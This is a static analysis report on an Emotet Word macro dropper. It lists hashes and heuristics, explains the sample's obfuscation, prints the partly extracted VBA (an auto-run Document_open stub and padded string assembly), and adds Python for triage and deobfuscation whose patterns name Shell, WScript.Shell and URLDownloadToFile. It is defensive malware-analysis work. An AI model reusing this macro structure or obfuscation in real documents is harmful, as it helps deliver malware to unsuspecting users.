Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 25433841ce92c587…

MALICIOUS

Office (OLE)

Size: 242.8 KB
Created: 2020-01-15 12:05:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 5d6e6b38d9e42e45c17ae275c037d727
SHA-1: 170e8c3b8c18be54d13de368021b70843bc5f7ee
SHA-256: 25433841ce92c5876f9df1ceb1cd97827a28cb328b996b7a7051006ebe9a6f4d
Risk score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV matches the file with the signature 'Doc.Malware.Emotet-7540219-0', a strong indicator of the Emotet family. Static analysis found VBA macros: a 'Document_Open' handler, which Word runs automatically when the document is opened, does nothing but call into another module, and a 'GetObject' call is present in the project. GetObject is routinely used by macro droppers to obtain an automation or WMI object through which a child process is launched, so that the payload does not run as a direct child of Word. The VBA is obfuscated in the style typical of Emotet droppers of this period: the visible function assembles a string by concatenation (the first character, ChrW(wdKeyP), evaluates to "P"), most of the string content is held in UserForm control properties rather than in code (the 'Whaeodtqkqi' module is a form, as its VB_Base class GUIDs show, and the code reads 'Whaeodtqkqi.Ekqdonwu', 'Whaeodtqkqi.Wnbyoebd' and 'Whaeodtqkqi.Zazqvyncyowi.Tag'), a junk delimiter (",,,,sdf7&&jsad,,,") is stripped with Split/Join, and the logic is padded with nested 'Do While' loops whose conditions compare never-assigned variables to constants and therefore never execute. Taken together, these elements indicate a macro whose purpose is to download and execute a second-stage payload; the assembled command itself is not recoverable from the module text alone, because its pieces live in the form data.

Heuristics (6)

  • ClamAV: Doc.Malware.Emotet-7540219-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotet-7540219-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML schema namespace, expected in any Word document that carries drawing content; it is benign and not a network indicator.
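The source-level equivalent of the OLE_VBA_DOCOPEN, OLE_VBA_GETOBJ and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics can be approximated with a token scan that pairs an auto-execution entry point with a shell/object-execution token, plus a check for the dead "Do While" padding seen in the extracted module. This is an added example, not the analysis platform's own code; the fragment it scans is constructed (the Document_open stub and the junk loop mirror the extracted module, while the GetObject line is an assumption, since the extracted source is truncated before any such call).

```python
import re

# Constructed VBA fragment modelled on the traits the report lists.
# The GetObject line is hypothetical; the real call is not in the visible source.
SAMPLE_VBA = """Private Sub Document_open()
Iiyvvjoo
End Sub
Function Iiyvvjoo()
   Do While Jmgtmxgu = 9875
      Fvatlefspdlgu = Cos(8 + CStr(750))
   Loop
   Set Svc = GetObject("winmgmts:")
End Function
"""

# Procedures Office runs without user interaction.
AUTOEXEC_RE = re.compile(
    r"\b(Document_Open|AutoOpen|Auto_Open|AutoExec|Workbook_Open|Document_Close|AutoClose)\b",
    re.I)
# Tokens that reach process creation, object instantiation or downloads.
EXEC_RE = re.compile(
    r"\b(GetObject|CreateObject|Shell|ShellExecute|winmgmts|Win32_Process|"
    r"WScript\.Shell|URLDownloadToFile|XMLHTTP)\b", re.I)
LOOP_RE = re.compile(r"^\s*Do While (\w+)\s*=\s*\d+", re.I | re.M)
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=", re.M)


def dead_loops(src):
    """Loop variables used as 'Do While <name> = <number>' that are never assigned.

    An unassigned VBA Variant is Empty, which compares as 0, so 'Empty = 9875'
    is False and the loop body never runs: it is padding, not logic.
    """
    assigned = {m.group(1).lower() for m in ASSIGN_RE.finditer(src)}
    return [name for name in LOOP_RE.findall(src) if name.lower() not in assigned]


def triage(src):
    """Pair auto-exec entry points with execution tokens, as the p-code heuristic does."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)}, key=str.lower)
    exec_tokens = sorted({m.group(1) for m in EXEC_RE.finditer(src)}, key=str.lower)
    verdict = "suspicious" if autoexec and exec_tokens else "review"
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "dead_loops": dead_loops(src),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

The same token pairing is what the p-code heuristic applies to the compiled stream, which is why it still fires when the source module is stripped or fails to decompress; on a real document, feed it the output of olevba rather than the constructed string.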

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11139 bytes
SHA-256: e27417742d7119688d67fc189fe3abeeca8bc8bb5082e13849168b82b627a447
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Rncwejxkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Iiyvvjoo
End Sub

Attribute VB_Name = "Whaeodtqkqi"
Attribute VB_Base = "0{52D0F05A-089C-4C08-9B1B-AB764DB4D7B5}{36B4AEC5-77EA-4BAB-AC54-D80C3EA04A94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Aplhseob"
Function Yenwuidyxwz()
   Do While Jmgtmxgu = 9875
      Do While Okladkfofrymd = 34
            Fvatlefspdlgu = Cos(8 + CStr(750))
      Loop
            Do While Nfotlpltbvw = 123
            Kewjjwhbf = Vjswwrelcoet
            Khuczxoeyi = 3253
      Loop
            Do While Cwyfohevy = 667
            Owjrlxrfkyzzo = CDbl(324)
            Gceqkjkqphnwa = Int(496)
      Loop
            Do While Clikffpgdhh = 2342
            Hcxjsobb = CInt(Soegujyar)
      Loop
            Do While Woqdhtrwbidhj = 3247
            Jdelvnkcpwa = Sgn(713)
            Xegpsekngfku = CByte(Qzoguxhzv + Oimmbhguw)
      Loop
Loop
Bhmfieewqmax = ChrW(wdKeyP)
   Do While Uaufrffcie = 9875
      Do While Hyhfzjzzj = 34
            Ztebuipda = Cos(8 + CStr(750))
      Loop
            Do While Ijpugstoh = 123
            Sxbpmdwclzvvu = Elutaeeapx
            Cggvsldah = 3253
      Loop
            Do While Vlhyqgmou = 667
            Nitntrnwlswz = CDbl(324)
            Fedjqleegyht = Int(496)
      Loop
            Do While Ucjvvitybes = 2342
            Lomzmndlcj = CInt(Xpjbvgzk)
      Loop
            Do While Iibdlchc = 3247
            Eytqtzufddr = Sgn(713)
            Rysjwgysc = CByte(Fdxjcadzkn + Wtivlugwkqeke)
      Loop
Loop
Yzofkzbu = Bhmfieewqmax + Whaeodtqkqi.Ekqdonwu + Whaeodtqkqi.Wnbyoebd
   Do While Qnfrughmtanf = 9875
      Do While Wnrtcnbetzjp = 34
            Kzrnucvavp = Cos(8 + CStr(750))
      Loop
            Do While Oevffomw = 123
            Ctgutmtgied = Tjzkswws
            Zzxinuudhjvx = 3253
      Loop
            Do While Aiihpgvar = 667
            Wfetaewz = CDbl(324)
            Vvdflnbwn = Int(496)
      Loop
            Do While Lskjnodvyzivg = 2342
            Qkgezxyafnf = CInt(Stddwfln)
      Loop
            Do While Mptebhmzxo = 3247
            Rpjgynrewinzc = Sgn(713)
            Ezagbvauogtw = CByte(Nimgvcouphxv + Dctcwliawi)
      Loop
Loop
Ctnwawndbnwwg = Split(Yzofkzbu + LTrim(LTrim(Whaeodtqkqi.Zazqvyncyowi. _
Tag)), ",,,,sdf7&&jsad,,,")
   Do While Lmwfcmwjdvx = 9875
      Do While Rborgbgodrg = 34
            Nvlzgssowbrl = Cos(8 + CStr(750))
      Loop
            Do While Aftmqgvtudj = 123
            Daiuqzjz = Doeqcuzwfsmgi
            Pzxtbipfs = 3253
      Loop
            Do While Ogaleqyhpym = 667
            Yugeiowrypbz = CDbl(324)
            Apojmbogs = Int(496)
      Loop
            Do While Owibtgcjfvgc = 2342
            Etwprzltkyrbp = CInt(Erbkkuroqfi)
      Loop
            Do While Fjtncmihrrb = 3247
            Uljkrrcvb = Sgn(713)
            Rbbmfgkjb = CByte(Aedzcrgmazn + Fegnqvuegovbk)
      Loop
Loop
Yenwuidyxwz = Zlcfvwfxnhb + Join(Ctnwawndbnwwg, "") + Zlcfvwfxnhb
   Do While Jhbqjhfftekb = 9875
      Do While Vvdulhuz = 34
            Kiirqgyi = Cos(8 + CStr(750))
      Loop
            Do While Ogjwzpfdphryb = 123
            Zpwvibkf = Bznonfcsb
            Mgvvbqjvjlg = 3253
      Loop
            Do While Rqcmaxebirx = 667
            Obbpgaymmjbz = CDbl(324)
            Ajrtuewxxd = Int(496)
      Loop
            Do While Dlmeoxfjciuu = 2342
            Weehanumd = CInt(Yclwqexzown)
      Loop
            Do While Uduwispxoo = 3247
            Tpcbxqhunqvt = Sgn(713)
            Dwuqkievnx = CByte(Elcskodexpvyr + Fvdiajwot)
      Loop
Loop
End Function
Fun
... (truncated)
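Once the dead loops are ignored, Yenwuidyxwz reduces to five statements, and those can be replayed outside Word to recover the assembled string. The Python below emulates exactly that assembly; it is an added example, not part of the report or the sample. The three control values it takes (Whaeodtqkqi.Ekqdonwu, Whaeodtqkqi.Wnbyoebd and Whaeodtqkqi.Zazqvyncyowi.Tag) are stored in the UserForm, not in the module text, so the demo values here are constructed placeholders, and Zlcfvwfxnhb is treated as Empty because it is never assigned in the visible source.

```python
# Emulation of the string assembly in Yenwuidyxwz (dead Do While loops dropped).
WD_KEY_P = 80                      # Word's wdKeyP constant, so ChrW(wdKeyP) is "P"
JUNK_DELIM = ",,,,sdf7&&jsad,,,"   # delimiter handed to Split in the extracted module


def vba_ltrim(s):
    """VBA LTrim strips leading spaces only, not tabs or newlines."""
    return s.lstrip(" ")


def emulate_yenwuidyxwz(ekqdonwu, wnbyoebd, tag, wrapper=""):
    """Return the string Yenwuidyxwz builds.

    ekqdonwu, wnbyoebd: values of Whaeodtqkqi.Ekqdonwu / Whaeodtqkqi.Wnbyoebd
    tag:                value of Whaeodtqkqi.Zazqvyncyowi.Tag
    wrapper:            Zlcfvwfxnhb; never assigned in the visible source, so Empty,
                        which concatenates as "" (assumption)
    """
    bhmfieewqmax = chr(WD_KEY_P)                      # Bhmfieewqmax = ChrW(wdKeyP)
    yzofkzbu = bhmfieewqmax + ekqdonwu + wnbyoebd     # "+" on strings is concatenation
    pieces = (yzofkzbu + vba_ltrim(vba_ltrim(tag))).split(JUNK_DELIM)  # Split(...)
    return wrapper + "".join(pieces) + wrapper        # Join(Ctnwawndbnwwg, "")


# Constructed placeholder control values (hypothetical, not the sample's real data).
DEMO_EKQDONWU = "ro,,,,sdf7&&jsad,,,gram"
DEMO_WNBYOEBD = ".exe ,,,,sdf7&&jsad,,,/arg"
DEMO_TAG = "   ,,,,sdf7&&jsad,,,ument"


def demo():
    return emulate_yenwuidyxwz(DEMO_EKQDONWU, DEMO_WNBYOEBD, DEMO_TAG)


if __name__ == "__main__":
    print(demo())   # Program.exe /argument
```

To run this against the real document, substitute the control values that olevba recovers from the form storage for the placeholders; the leading "P" and the delimiter are fixed by the module text, so the emulation will show whether the recovered pieces assemble into a coherent command line.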